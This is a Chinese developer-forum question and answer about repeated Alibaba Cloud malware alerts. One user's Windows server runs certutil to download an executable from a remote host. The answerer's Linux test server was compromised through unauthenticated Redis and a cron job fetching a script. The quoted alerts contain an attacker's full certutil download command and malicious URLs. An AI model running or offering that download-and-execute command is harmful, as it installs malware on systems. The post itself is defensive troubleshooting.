开发者社区 问答 正文

阿里云服务器总是报恶意下载 利用certutil.exe,怎么处理?

该告警由如下引擎检测发现: 父进程路径:C:/Windows/System32/cmd.exe 父进程命令行:cmd.exe /c certutil.exe -urlcache -split -f http://UeR.ReiyKiQ.ir/download.exe C:\Windows/Temp/ulxxghabqdnewpe11957.exe 父进程id:3780 进程ID:3124 URL链接:http://uer.reiykiq.ir/download.exe 进程路径:C:/Windows/System32/certutil.exe 命令行参数:certutil.exe -urlcache -split -f http://UeR.ReiyKiQ.ir/download.exe C:\Windows/Temp/ulxxghabqdnewpe11957.exe 与该URL有关联的漏洞:None

尝试了很多办法,过几天就又报这个问题,怎么解决?

展开
收起
1837197565457235 2020-08-06 14:28:46 1332 分享 版权
1 条回答
写回答
取消 提交回答
  • 父进程路径:/usr/sbin/crond URL 链接:http://185.181.10.234/e5db0e07c3d7be80v520... 与该 URL 有关联的漏洞:Drupal CVE-2018-7600 ,ElasticSearch Groovy 脚本远程代码执行漏洞 CVE-2015-1427 ,Hadoop Yarn REST API 未授权漏洞 ,WebLogic CVE-2017-10271 (PS:这个点我觉得并没很大用处,可能阿里云考虑的比较仔细)

    所以我当时就很诧异,因为这个服务器是我司一个测试服务器,所以很多漏洞没更新,我也不怎么处理,被攻击也可能是常有的事,也无伤大雅。

    然后第一反应就是,这不就是定时任务 crontab 跑了个东西,可能是访问了某个链接被阿里云检测到不合法了。

    然后我就开始一顿查询定时任务,然后开始清理。

    查询crontab执行命令:tail -f /var/log/cron

    上面这个记录看着出了一些 nobody 的用户组进行了一个未知的定时任务执行记录。 然后 crontab -l 除了自己的业务定时任务并没看到这个所谓的 curl 了某个链接的定时脚本。然后我直接采取非常暴力的 rm 方法,把所有定时任务全部清除。

    (第二天发现并没什么用。。。)

    接着我就开始百度了(我搜了这个 :185.181.10.234/e5db0e07c3d7be80v520/init.sh),这个东西会不会有人遇到过,果然还是度娘靠谱,光一个链接就能捕捉到我要啥。然后我就看到了这篇文章:

    《一个有趣的利用 redis 未授权访问漏洞进行挖矿的分析及防范》 https://www.freebuf.com/column/211777.html

    简直是救命稻草,恍然大悟的我想起来测试服当时 redis 安装完确实没有怎么处理过,密码也没设置。

    然后我开始设置 redis 的登陆密码和权限,怎么设置参考 https://www.cnblogs.com/tenny-peng/p/11543440.html

    顺带一起清空且重置了一下 redis。

    我就觉得这下应该万事大吉了。然后第三天老板依旧收到了来自阿里的警告信息。我郁闷了,啥玩意,为啥还可以,我不都设置密码了么。咋还执行呢?

    想起前一天大佬提醒我要注意 ssh key 是否被人添加了免密登录的权限。其实我真的看了,

    打开 vi authorized_keys 并没有任何东西。然后我顺带把其它 /root/.ssh/ 下的四个文件都翻了一遍。 才发现 known_hosts 文件中多了两个 IP 地址为新加坡的 ssh key , 我才明白为啥上面做了那一堆都没用了。 所以我解决上述问题的方法就是:

    清空 crontab 未知的计划任务。 设置 redis 端口权限和账号密码(敲重点!) 清空未知的 ssh key

    2021-02-07 20:06:16
    赞同 展开评论
问答分类:
问答标签:
问答地址: